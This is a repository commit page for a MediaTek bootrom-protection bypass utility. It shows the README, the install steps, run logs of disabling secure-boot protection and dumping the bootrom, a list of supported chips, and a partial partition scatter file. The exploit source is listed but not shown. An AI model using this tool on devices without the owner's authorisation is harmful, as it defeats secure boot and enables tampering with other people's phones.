sam749
/

mtk-bypass-utility

Model card Files Files and versions Community

sam749 commited on Mar 31

Commit

05db1b4

verified ·

1 Parent(s): 78ce89c

Upload folder using huggingface_hub

Browse files

Files changed (21) hide show

.gitattributes +2 -0
.gitignore +4 -0
HOW_TO_USE.txt +5 -0
LICENSE +21 -0
README.md +52 -0
UsbDk_1.0.22_x64.msi +3 -0
bypass_utility.log +250 -0
exploits_collection/README.md +34 -0
firmware-tweaks/MT6765_Android_scatter.txt +766 -0
firmware-tweaks/scatter_split.txt +169 -0
firmware-tweaks/split.py +95 -0
firmware-tweaks/utils.py +56 -0
hf_upload.bash +1 -0
libusb-1.0.dll +3 -0
main.py +237 -0
src/bruteforce.py +63 -0
src/common.py +21 -0
src/config.py +61 -0
src/device.py +343 -0
src/exploit.py +97 -0
src/logger.py +9 -0

.gitattributes CHANGED Viewed

@@ -33,3 +33,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text

 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+libusb-1.0.dll filter=lfs diff=lfs merge=lfs -text
+UsbDk_1.0.22_x64.msi filter=lfs diff=lfs merge=lfs -text

.gitignore ADDED Viewed

	@@ -0,0 +1,4 @@

+src/__pycache__/
+*.json5
+*.bin
+.idea

HOW_TO_USE.txt ADDED Viewed

	@@ -0,0 +1,5 @@

+1. Install python
+2. Install UsbDk (64-bit)
+3. Run `pip install pyusb json5`
+4. Run `python main.py'
+5. Power off device & connect via usb

LICENSE ADDED Viewed

	@@ -0,0 +1,21 @@

+MIT License
+Copyright (c) 2021 Dinolek
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md ADDED Viewed

	@@ -0,0 +1,52 @@

+# Mediatek Bypass utility
+> Personally tested on `Infinix Hot 10 Play X688B`
+Small utility to disable bootrom protection(sla and daa) on Mediatek devices
+## Usage on Windows
+Skip steps 1-3 after first usage
+1. Install [python (64-bit)](https://www.python.org/downloads)(select "Add Python X.X to PATH")
+2. Install [UsbDk (64-bit)](https://github.com/daynix/UsbDk/releases)
+3. Install pyusb, json5 with command:
+```
+pip install pyusb json5
+```
+4. Run this command and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+```
+python main.py
+```
+5. After that, without disconnecting phone, run SP Flash Tool
+## Usage on Linux
+Skip steps 1-2 after first usage
+To use kamakiri you need [FireISO](https://github.com/amonet-kamakiri/fireiso/releases) or [this patch](https://github.com/amonet-kamakiri/kamakiri/blob/master/kernel.patch) for your kernel
+Prebuilt kernels for various distros are available [here](https://github.com/amonet-kamakiri/prebuilt-kernels)
+1. Install python
+2. Install pyusb, json5 as root with command:
+```
+pip install pyusb json5
+```
+3. Run this command as root and connect your powered off phone with volume+ button, you should get "Protection disabled" at the end
+```
+./main.py
+```
+4. After that, without disconnecting phone, run SP Flash Tool in UART Connection mode
+## Credits
+- [@chaosmaster](https://github.com/chaosmaster)
+- [@xyzz](https://github.com/xyzz)

UsbDk_1.0.22_x64.msi ADDED Viewed

	@@ -0,0 +1,3 @@

+version https://git-lfs.github.com/spec/v1
+oid sha256:91f6f695e1e13c656024e6d3b55620bf08d8835ef05ee0496935ba6bb62466a5
+size 6348800

bypass_utility.log ADDED Viewed

	@@ -0,0 +1,250 @@

+[2025-03-30 18:55:40.163719] Waiting for device
+[2025-03-30 18:55:52.424270] Found device = 0e8d:0003
+[2025-03-30 18:55:52.650426] Device hw code: 0x766
+[2025-03-30 18:55:52.650426] Device hw sub code: 0x8a00
+[2025-03-30 18:55:52.651427] Device hw version: 0xca00
+[2025-03-30 18:55:52.651427] Device sw version: 0x0
+[2025-03-30 18:55:52.652427] Device secure boot: True
+[2025-03-30 18:55:52.653429] Device serial link authorization: False
+[2025-03-30 18:55:52.653429] Device download agent authorization: True
+[2025-03-30 18:55:52.654428] Disabling watchdog timer
+[2025-03-30 18:55:52.656534] Disabling protection
+[2025-03-30 18:55:52.684046] Protection disabled
+[2025-03-30 18:59:45.675191] Waiting for device
+[2025-03-30 19:00:05.607088] Found device = 0e8d:0003
+[2025-03-30 19:00:05.838795] Device hw code: 0x766
+[2025-03-30 19:00:05.839797] Device hw sub code: 0x8a00
+[2025-03-30 19:00:05.839797] Device hw version: 0xca00
+[2025-03-30 19:00:05.840798] Device sw version: 0x0
+[2025-03-30 19:00:05.841799] Device secure boot: True
+[2025-03-30 19:00:05.842799] Device serial link authorization: False
+[2025-03-30 19:00:05.843798] Device download agent authorization: True
+[2025-03-30 19:00:05.844797] Disabling watchdog timer
+[2025-03-30 19:00:05.846797] Disabling protection
+[2025-03-30 19:00:05.874968] Protection disabled
+[2025-03-30 19:06:55.042281] Waiting for device
+[2025-03-30 19:07:02.741112] Found device = 0e8d:0003
+[2025-03-30 19:07:02.963512] Device hw code: 0x766
+[2025-03-30 19:07:02.964513] Device hw sub code: 0x8a00
+[2025-03-30 19:07:02.965513] Device hw version: 0xca00
+[2025-03-30 19:07:02.965513] Device sw version: 0x0
+[2025-03-30 19:07:02.966513] Device secure boot: True
+[2025-03-30 19:07:02.967514] Device serial link authorization: False
+[2025-03-30 19:07:02.967514] Device download agent authorization: True
+[2025-03-30 19:07:02.968514] Disabling watchdog timer
+[2025-03-30 19:07:02.970879] Disabling protection
+[2025-03-30 19:07:02.999589] Protection disabled
+[2025-03-30 19:24:07.022011] Waiting for device
+[2025-03-30 19:24:45.045941] Found device = 0e8d:0003
+[2025-03-30 19:24:45.292066] Device hw code: 0x766
+[2025-03-30 19:24:45.292066] Device hw sub code: 0x8a00
+[2025-03-30 19:24:45.293068] Device hw version: 0xca00
+[2025-03-30 19:24:45.295068] Device sw version: 0x0
+[2025-03-30 19:24:45.296067] Device secure boot: True
+[2025-03-30 19:24:45.296067] Device serial link authorization: False
+[2025-03-30 19:24:45.297067] Device download agent authorization: True
+[2025-03-30 19:24:45.298068] Disabling watchdog timer
+[2025-03-30 19:24:45.300067] Disabling protection
+[2025-03-30 19:24:45.331068] Protection disabled
+[2025-03-30 14:27:17.677816] Waiting for device
+[2025-03-30 14:28:01.724914] Found device = 0e8d:0003
+[2025-03-30 14:28:01.972474] Device hw code: 0x766
+[2025-03-30 14:28:01.972474] Device hw sub code: 0x8a00
+[2025-03-30 14:28:01.973473] Device hw version: 0xca00
+[2025-03-30 14:28:01.973473] Device sw version: 0x0
+[2025-03-30 14:28:01.974474] Device secure boot: True
+[2025-03-30 14:28:01.974474] Device serial link authorization: False
+[2025-03-30 14:28:01.975473] Device download agent authorization: True
+[2025-03-30 14:28:01.976475] Disabling watchdog timer
+[2025-03-30 14:28:01.978241] Disabling protection
+[2025-03-30 14:28:01.989243] Using kamakiri
+[2025-03-30 14:28:01.999445] Protection disabled
+[2025-03-30 14:31:17.857838] Waiting for device
+[2025-03-30 14:31:26.788119] Found device = 0e8d:0003
+[2025-03-30 14:31:27.015928] Device hw code: 0x766
+[2025-03-30 14:31:27.016928] Device hw sub code: 0x8a00
+[2025-03-30 14:31:27.016928] Device hw version: 0xca00
+[2025-03-30 14:31:27.017929] Device sw version: 0x0
+[2025-03-30 14:31:27.018927] Device secure boot: True
+[2025-03-30 14:31:27.018927] Device serial link authorization: False
+[2025-03-30 14:31:27.019928] Device download agent authorization: True
+[2025-03-30 14:31:27.019928] Disabling watchdog timer
+[2025-03-30 14:31:27.021927] Disabling protection
+[2025-03-30 14:31:27.022929] Using kamakiri
+[2025-03-30 14:31:27.034260] Protection disabled
+[2025-03-30 15:00:38.624821] Waiting for device
+[2025-03-30 15:00:49.075305] Found device = 0e8d:0003
+[2025-03-30 15:00:49.301589] Device hw code: 0x766
+[2025-03-30 15:00:49.302589] Device hw sub code: 0x8a00
+[2025-03-30 15:00:49.303590] Device hw version: 0xca00
+[2025-03-30 15:00:49.303590] Device sw version: 0x0
+[2025-03-30 15:00:49.304589] Device secure boot: True
+[2025-03-30 15:00:49.304589] Device serial link authorization: False
+[2025-03-30 15:00:49.305590] Device download agent authorization: True
+[2025-03-30 15:00:49.306591] Disabling watchdog timer
+[2025-03-30 15:00:49.308590] Disabling protection
+[2025-03-30 15:00:49.310590] Using kamakiri
+[2025-03-30 15:00:49.321530] Protection disabled
+[2025-03-30 15:58:29.967337] Waiting for device
+[2025-03-30 15:58:53.410958] Found device = 0e8d:0003
+[2025-03-30 15:58:53.710266] Device hw code: 0x766
+[2025-03-30 15:58:53.711267] Device hw sub code: 0x8a00
+[2025-03-30 15:58:53.711267] Device hw version: 0xca00
+[2025-03-30 15:58:53.712267] Device sw version: 0x0
+[2025-03-30 15:58:53.712267] Device secure boot: True
+[2025-03-30 15:58:53.713267] Device serial link authorization: False
+[2025-03-30 15:58:53.714266] Device download agent authorization: True
+[2025-03-30 15:58:53.715266] Disabling watchdog timer
+[2025-03-30 15:58:53.717291] Disabling protection
+[2025-03-30 15:58:53.749015] Protection disabled
+[2025-03-30 16:03:40.629448] Waiting for device
+[2025-03-30 16:03:47.032978] Found device = 0e8d:0003
+[2025-03-30 16:03:47.302838] Device hw code: 0x766
+[2025-03-30 16:03:47.303838] Device hw sub code: 0x8a00
+[2025-03-30 16:03:47.304839] Device hw version: 0xca00
+[2025-03-30 16:03:47.305839] Device sw version: 0x0
+[2025-03-30 16:03:47.306840] Device secure boot: True
+[2025-03-30 16:03:47.307842] Device serial link authorization: False
+[2025-03-30 16:03:47.308840] Device download agent authorization: True
+[2025-03-30 16:03:47.308840] Disabling watchdog timer
+[2025-03-30 16:03:47.311839] Disabling protection
+[2025-03-30 16:03:47.342886] Protection disabled
+[2025-03-30 16:04:19.031387] Waiting for device
+[2025-03-30 16:04:36.829544] Found device = 0e8d:0003
+[2025-03-30 16:04:37.098365] Device hw code: 0x766
+[2025-03-30 16:04:37.098365] Device hw sub code: 0x8a00
+[2025-03-30 16:04:37.099366] Device hw version: 0xca00
+[2025-03-30 16:04:37.100366] Device sw version: 0x0
+[2025-03-30 16:04:37.100366] Device secure boot: True
+[2025-03-30 16:04:37.101367] Device serial link authorization: False
+[2025-03-30 16:04:37.102367] Device download agent authorization: True
+[2025-03-30 16:04:37.102367] Disabling watchdog timer
+[2025-03-30 16:04:37.105274] Disabling protection
+[2025-03-30 16:04:37.177177] Protection disabled
+[2025-03-30 16:24:47.810791] Waiting for device
+[2025-03-30 16:26:05.907340] Found device = 0e8d:2000
+[2025-03-30 16:26:17.839154] Device hw code: 0x766
+[2025-03-30 16:26:17.839154] Device hw sub code: 0x8a00
+[2025-03-30 16:26:17.840160] Device hw version: 0xca00
+[2025-03-30 16:26:17.841157] Device sw version: 0x0
+[2025-03-30 16:26:17.842157] Device secure boot: True
+[2025-03-30 16:26:17.843157] Device serial link authorization: False
+[2025-03-30 16:26:17.843157] Device download agent authorization: True
+[2025-03-30 16:26:17.845157] Found device in preloader mode, trying to crash...
+[2025-03-30 16:26:17.847157] status is 7024
+[2025-03-30 16:26:18.854501] Waiting for device
+[2025-03-30 16:26:18.856501] Found device = 0e8d:0003
+[2025-03-30 16:26:19.119788] Device hw code: 0x766
+[2025-03-30 16:26:19.119788] Device hw sub code: 0x8a00
+[2025-03-30 16:26:19.121053] Device hw version: 0xca00
+[2025-03-30 16:26:19.122054] Device sw version: 0x0
+[2025-03-30 16:26:19.122054] Device secure boot: True
+[2025-03-30 16:26:19.123055] Device serial link authorization: False
+[2025-03-30 16:26:19.124054] Device download agent authorization: True
+[2025-03-30 16:26:19.124054] Disabling watchdog timer
+[2025-03-30 16:26:19.126714] Disabling protection
+[2025-03-30 16:26:19.156884] Protection disabled
+[2025-03-30 16:28:14.415118] Waiting for device
+[2025-03-30 16:28:14.417119] Found device = 0e8d:0003
+[2025-03-30 16:28:14.684816] Device hw code: 0x766
+[2025-03-30 16:28:14.685815] Device hw sub code: 0x8a00
+[2025-03-30 16:28:14.686816] Device hw version: 0xca00
+[2025-03-30 16:28:14.686816] Device sw version: 0x0
+[2025-03-30 16:28:14.687816] Device secure boot: False
+[2025-03-30 16:28:14.687816] Device serial link authorization: False
+[2025-03-30 16:28:14.688817] Device download agent authorization: False
+[2025-03-30 16:28:14.689818] Disabling watchdog timer
+[2025-03-30 16:28:14.692135] Insecure device, sending payload using send_da
+[2025-03-30 16:28:14.748482] Found send_dword, dumping bootrom to bootrom_766.bin
+[2025-03-30 16:29:05.907328] Waiting for device
+[2025-03-30 16:29:09.219474] Found device = 0e8d:2000
+[2025-03-30 16:29:20.608828] Device hw code: 0x766
+[2025-03-30 16:29:20.609829] Device hw sub code: 0x8a00
+[2025-03-30 16:29:20.610816] Device hw version: 0xca00
+[2025-03-30 16:29:20.610816] Device sw version: 0x0
+[2025-03-30 16:29:20.612815] Device secure boot: True
+[2025-03-30 16:29:20.613815] Device serial link authorization: False
+[2025-03-30 16:29:20.613815] Device download agent authorization: True
+[2025-03-30 16:29:20.614831] Found device in preloader mode, trying to crash...
+[2025-03-30 16:29:20.617909] status is 7024
+[2025-03-30 16:29:21.620024] Waiting for device
+[2025-03-30 16:29:21.622036] Found device = 0e8d:0003
+[2025-03-30 16:29:21.867785] Device hw code: 0x766
+[2025-03-30 16:29:21.868785] Device hw sub code: 0x8a00
+[2025-03-30 16:29:21.868785] Device hw version: 0xca00
+[2025-03-30 16:29:21.869786] Device sw version: 0x0
+[2025-03-30 16:29:21.869786] Device secure boot: True
+[2025-03-30 16:29:21.870786] Device serial link authorization: False
+[2025-03-30 16:29:21.871787] Device download agent authorization: True
+[2025-03-30 16:29:21.872791] Disabling watchdog timer
+[2025-03-30 16:29:21.875154] Disabling protection
+[2025-03-30 16:29:21.905106] Protection disabled
+[2025-03-30 16:48:01.676685] Waiting for device
+[2025-03-30 16:48:01.677686] Found device = 0e8d:2000
+[2025-03-30 16:48:13.037939] Device hw code: 0x766
+[2025-03-30 16:48:13.037939] Device hw sub code: 0x8a00
+[2025-03-30 16:48:13.038942] Device hw version: 0xca00
+[2025-03-30 16:48:13.039941] Device sw version: 0x0
+[2025-03-30 16:48:13.039941] Device secure boot: True
+[2025-03-30 16:48:13.040941] Device serial link authorization: False
+[2025-03-30 16:48:13.042941] Device download agent authorization: True
+[2025-03-30 16:48:13.043942] Found device in preloader mode, trying to crash...
+[2025-03-30 16:48:13.047942] status is 7024
+[2025-03-30 16:48:14.057950] Waiting for device
+[2025-03-30 16:48:14.058950] Found device = 0e8d:0003
+[2025-03-30 16:48:14.320814] Device hw code: 0x766
+[2025-03-30 16:48:14.321814] Device hw sub code: 0x8a00
+[2025-03-30 16:48:14.322814] Device hw version: 0xca00
+[2025-03-30 16:48:14.322814] Device sw version: 0x0
+[2025-03-30 16:48:14.323814] Device secure boot: True
+[2025-03-30 16:48:14.325324] Device serial link authorization: False
+[2025-03-30 16:48:14.327346] Device download agent authorization: True
+[2025-03-30 16:48:14.328346] Disabling watchdog timer
+[2025-03-30 16:48:14.330887] Disabling protection
+[2025-03-30 16:48:14.363226] Protection disabled
+[2025-03-30 16:50:45.192561] Waiting for device
+[2025-03-30 16:51:25.446559] Found device = 0e8d:2000
+[2025-03-30 16:51:37.474047] Device hw code: 0x766
+[2025-03-30 16:51:37.475048] Device hw sub code: 0x8a00
+[2025-03-30 16:51:37.476050] Device hw version: 0xca00
+[2025-03-30 16:51:37.477048] Device sw version: 0x0
+[2025-03-30 16:51:37.477048] Device secure boot: True
+[2025-03-30 16:51:37.478050] Device serial link authorization: False
+[2025-03-30 16:51:37.479049] Device download agent authorization: True
+[2025-03-30 16:51:37.480049] Found device in preloader mode, trying to crash...
+[2025-03-30 16:51:37.482048] status is 7024
+[2025-03-30 16:51:38.490922] Waiting for device
+[2025-03-30 16:51:38.492932] Found device = 0e8d:0003
+[2025-03-30 16:51:38.703067] Device hw code: 0x766
+[2025-03-30 16:51:38.704575] Device hw sub code: 0x8a00
+[2025-03-30 16:51:38.704575] Device hw version: 0xca00
+[2025-03-30 16:51:38.706006] Device sw version: 0x0
+[2025-03-30 16:51:38.707006] Device secure boot: True
+[2025-03-30 16:51:38.708007] Device serial link authorization: False
+[2025-03-30 16:51:38.709010] Device download agent authorization: True
+[2025-03-30 16:51:38.709010] Disabling watchdog timer
+[2025-03-30 16:51:38.711008] Disabling protection
+[2025-03-30 16:51:38.741665] Protection disabled
+[2025-03-30 17:29:04.508432] Waiting for device
+[2025-03-30 17:29:25.433937] Found device = 0e8d:2000
+[2025-03-30 17:29:36.976516] Device hw code: 0x766
+[2025-03-30 17:29:36.977516] Device hw sub code: 0x8a00
+[2025-03-30 17:29:36.978517] Device hw version: 0xca00
+[2025-03-30 17:29:36.979518] Device sw version: 0x0
+[2025-03-30 17:29:36.982520] Device secure boot: True
+[2025-03-30 17:29:36.982520] Device serial link authorization: False
+[2025-03-30 17:29:36.983517] Device download agent authorization: True
+[2025-03-30 17:29:36.984519] Found device in preloader mode, trying to crash...
+[2025-03-30 17:29:36.987517] status is 7024
+[2025-03-30 17:29:37.998632] Waiting for device
+[2025-03-30 17:29:38.000634] Found device = 0e8d:0003
+[2025-03-30 17:29:38.267953] Device hw code: 0x766
+[2025-03-30 17:29:38.267953] Device hw sub code: 0x8a00
+[2025-03-30 17:29:38.269465] Device hw version: 0xca00
+[2025-03-30 17:29:38.269465] Device sw version: 0x0
+[2025-03-30 17:29:38.271801] Device secure boot: True
+[2025-03-30 17:29:38.271801] Device serial link authorization: False
+[2025-03-30 17:29:38.272799] Device download agent authorization: True
+[2025-03-30 17:29:38.273802] Disabling watchdog timer
+[2025-03-30 17:29:38.275799] Disabling protection
+[2025-03-30 17:29:38.308307] Protection disabled

exploits_collection/README.md ADDED Viewed

	@@ -0,0 +1,34 @@

+### Supported SoCs
+- mt6261
+- mt6572
+- mt6580
+- mt6582
+- mt6592
+- mt6595
+- mt6735
+- mt6737
+- mt6739
+- mt6750
+- mt6753
+- mt6755
+- mt6757
+- mt6761
+- mt6763
+- mt6765
+- mt6768
+- mt6771
+- mt6779
+- mt6785
+- mt6795
+- mt6797
+- mt6799
+- mt6833
+- mt6853
+- mt6873
+- mt6885
+- mt8127
+- mt8163
+- mt8167
+- mt8173
+- mt8590
+- mt8695

firmware-tweaks/MT6765_Android_scatter.txt ADDED Viewed

	@@ -0,0 +1,766 @@

+############################################################################################################
+#
+#  General Setting
+#
+############################################################################################################
+- general: MTK_PLATFORM_CFG
+  info:
+    - config_version: V1.1.2
+      platform: MT6765
+      project: x688b_h659
+      storage: EMMC
+      boot_channel: MSDC_0
+      block_size: 0x20000
+############################################################################################################
+#
+#  Layout Setting
+#
+############################################################################################################
+- partition_index: SYS0
+  partition_name: preloader
+  file_name: preloader_x688b_h659.bin
+  is_download: true
+  type: SV5_BL_BIN
+  linear_start_addr: 0x0
+  physical_start_addr: 0x0
+  partition_size: 0x40000
+  region: EMMC_BOOT1_BOOT2
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: BOOTLOADERS
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS1
+  partition_name: pgpt
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x0
+  physical_start_addr: 0x0
+  partition_size: 0x8000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS2
+  partition_name: boot_para
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x8000
+  physical_start_addr: 0x8000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS3
+  partition_name: proinfo
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x108000
+  physical_start_addr: 0x108000
+  partition_size: 0x300000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: PROTECTED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS4
+  partition_name: para
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x408000
+  physical_start_addr: 0x408000
+  partition_size: 0x80000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS5
+  partition_name: expdb
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x488000
+  physical_start_addr: 0x488000
+  partition_size: 0x1400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS6
+  partition_name: frp
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x1888000
+  physical_start_addr: 0x1888000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS7
+  partition_name: metadata
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x1988000
+  physical_start_addr: 0x1988000
+  partition_size: 0x2000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS8
+  partition_name: md_udc
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x3988000
+  physical_start_addr: 0x3988000
+  partition_size: 0x169a000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS9
+  partition_name: nvcfg
+  file_name: NONE
+  is_download: false
+  type: EXT4_IMG
+  linear_start_addr: 0x5022000
+  physical_start_addr: 0x5022000
+  partition_size: 0x2000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: PROTECTED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS10
+  partition_name: nvdata
+  file_name: NONE
+  is_download: false
+  type: EXT4_IMG
+  linear_start_addr: 0x7022000
+  physical_start_addr: 0x7022000
+  partition_size: 0x47de000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS11
+  partition_name: persist
+  file_name: NONE
+  is_download: false
+  type: EXT4_IMG
+  linear_start_addr: 0xb800000
+  physical_start_addr: 0xb800000
+  partition_size: 0x3000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: PROTECTED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS12
+  partition_name: protect1
+  file_name: NONE
+  is_download: false
+  type: EXT4_IMG
+  linear_start_addr: 0xe800000
+  physical_start_addr: 0xe800000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: PROTECTED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS13
+  partition_name: protect2
+  file_name: NONE
+  is_download: false
+  type: EXT4_IMG
+  linear_start_addr: 0xf000000
+  physical_start_addr: 0xf000000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: PROTECTED
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS14
+  partition_name: tkv
+  file_name: tkv.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xf800000
+  physical_start_addr: 0xf800000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS15
+  partition_name: recovery
+  file_name: recovery.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0xf900000
+  physical_start_addr: 0xf900000
+  partition_size: 0x2700000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS16
+  partition_name: seccfg
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x12000000
+  physical_start_addr: 0x12000000
+  partition_size: 0x800000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS17
+  partition_name: sec1
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x12800000
+  physical_start_addr: 0x12800000
+  partition_size: 0x200000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS18
+  partition_name: md1img
+  file_name: md1img.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x12a00000
+  physical_start_addr: 0x12a00000
+  partition_size: 0x6400000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS19
+  partition_name: spmfw
+  file_name: spmfw.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x18e00000
+  physical_start_addr: 0x18e00000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS20
+  partition_name: scp1
+  file_name: scp.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x18f00000
+  physical_start_addr: 0x18f00000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS21
+  partition_name: scp2
+  file_name: scp.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x19000000
+  physical_start_addr: 0x19000000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS22
+  partition_name: sspm_1
+  file_name: sspm.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x19100000
+  physical_start_addr: 0x19100000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS23
+  partition_name: sspm_2
+  file_name: sspm.img
+  is_download: true
+  type: NORMAL_ROM
+  linear_start_addr: 0x19200000
+  physical_start_addr: 0x19200000
+  partition_size: 0x100000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: UPDATE
+  is_upgradable: true
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS24
+  partition_name: gz1
+  file_name: NONE
+  is_download: false
+  type: NORMAL_ROM
+  linear_start_addr: 0x19300000
+  physical_start_addr: 0x19300000
+  partition_size: 0x1000000
+  region: EMMC_USER
+  storage: HW_STORAGE_EMMC
+  boundary_check: true
+  is_reserved: false
+  operation_type: INVISIBLE
+  is_upgradable: false
+  empty_boot_needed: false
+  reserve: 0x00
+- partition_index: SYS25
